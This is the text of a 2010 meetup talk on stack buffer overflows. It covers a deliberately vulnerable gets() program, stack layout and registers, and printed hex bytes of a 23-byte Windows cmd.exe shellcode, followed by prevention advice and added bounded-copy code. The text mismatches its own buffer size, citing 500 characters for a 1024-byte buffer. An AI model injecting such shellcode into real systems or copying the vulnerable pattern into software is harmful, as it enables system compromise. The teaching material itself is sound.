Buffer Overflow Demo by Saurabh Sharma @ null Banglore Meet, June, 2010
Buffer Overflows by: Saurabh Sharma
BUFFER
Buffer: The memory area where the user input is stored.
Overflow: The user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.
Anatomy of Buffer Overflows
```c
#include <stdio.h>

void get_input(void) {
    char buf[1024];
    gets(buf);        /* no length check: longer input overwrites what lies above buf on the stack */
}

int main(int argc, char *argv[]) {
    get_input();
    return 0;
}
```

The user controls the input. A malicious user can supply input of more than 500 chars. So what? The user can supply a malicious input which runs some other executable. This can also be your cmd.exe and may lead to system compromise.
A small example
Text: Contains instructions
Data: Contains initialized variables
BSS: Contains uninitialized global and static variables (initialized to 0)
Heap: Contains dynamic, uninitialized data (malloc())
Stack: Contains function arguments and local variables
Memory overview
Stack frame: holds the variables and data of a function
Stack: grows from higher memory addresses to lower ones
Heap: grows from lower addresses to higher ones
Memory overview
General purpose: For basic calculations.
ESI, EDI: Used mostly with arrays
Flags: Outcome of several instructions set the flags
Segment: Code, stack, data.
EBP: Base pointer, points to the beginning of the current stack frame
ESP: Stack pointer, points to the top of the stack
EIP: Instruction pointer, points to the next instruction
REGISTERS
The stack is a LIFO data structure: temporary memory that is set up when a function is called.
A new stack frame is created for each function call.
The return address is saved just above the local variables.
Stack Layout
Higher address
    +----------------------------+
    | parameters                 |
    | Return addr (saved EIP)    |
    | Saved EBP                  |
    | Local variables            |
    +----------------------------+
Lower address      (stack grows downwards)

So, if the EIP can be controlled, the next instruction to be executed can be controlled.
Stack Layout
Machine code that is injected into the overflowed buffer.
Does the work for you.
Work: executing a third program, adding an administrator, etc.
SHELLCODE
win32/xp sp2 (En) cmd.exe 23 bytes Author : Mountassif Moad A.K.A :
"\x8b\xec\x68\x65\x78\x65" "\x20\x68\x63\x6d\x64\x2e" "\x8d\x45\xf8\x50\xb8\x8D" "\x15\x86\x7C\xff\xd0";
EXAMPLE SHELLCODES(SMALL)
Bind-shell shellcode by NRAZIZ: binds to port 48138, password: haxor (char bindcode[]).
EXAMPLE SHELLCODES(bigger)
DEMO
strcpy(), strcat(), sprintf(), scanf(), sscanf(), fscanf(), vfscanf(), vsprintf(), vscanf(), vsscanf(), streadd(), strecpy(), strtrns()
MAJOR SNARES
Buffer sizes must be checked.
Use bounded alternatives, e.g. strncpy(dst, src, dst_size-1) instead of strcpy(dst, src) (and NUL-terminate dst explicitly, since strncpy does not guarantee termination).
Other protection mechanisms: /GS (stack cookie), ASLR, SafeSEH compilation.
PREVENTION
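Added example, not the deck's own code: bounded replacements for the get_input()/gets() pattern shown earlier and a terminating wrapper around the strncpy(dst, src, dst_size-1) advice above. The function names read_line_bounded, copy_bounded and would_overflow, and the 30-byte sample input, are constructed for this illustration.

```c
/* Constructed example (not from the deck): bounded replacements for the
 * gets()/strcpy() pattern, and why strncpy(dst, src, dst_size-1) alone is not enough. */
#include <stdio.h>
#include <string.h>

/* Reads one line into dst without writing past dst_size bytes, always NUL-terminates,
 * and drains the rest of an over-long line so it cannot spill into the next read.
 * Returns the number of bytes kept. */
size_t read_line_bounded(char *dst, size_t dst_size, FILE *in)
{
    if (dst_size == 0 || fgets(dst, (int)dst_size, in) == NULL) {
        if (dst_size > 0) dst[0] = '\0';
        return 0;
    }
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';                 /* strip the trailing newline */
    } else {
        int c;                           /* line did not fit: discard the excess */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return len;
}

/* Bounded copy that guarantees termination. strncpy(dst, src, dst_size-1) on its
 * own leaves dst unterminated once strlen(src) >= dst_size-1. */
size_t copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0) return 0;
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return strlen(dst);
}

/* Reports whether src (with its NUL) would overflow a dst of dst_size bytes. */
int would_overflow(const char *src, size_t dst_size)
{
    return strlen(src) >= dst_size;
}

int main(void)
{
    char buf[16];
    const char *oversized = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";   /* constructed: 30 bytes */
    copy_bounded(buf, sizeof buf, oversized);
    printf("kept %zu of %zu bytes: %s\n", strlen(buf), strlen(oversized), buf);
    return 0;
}
```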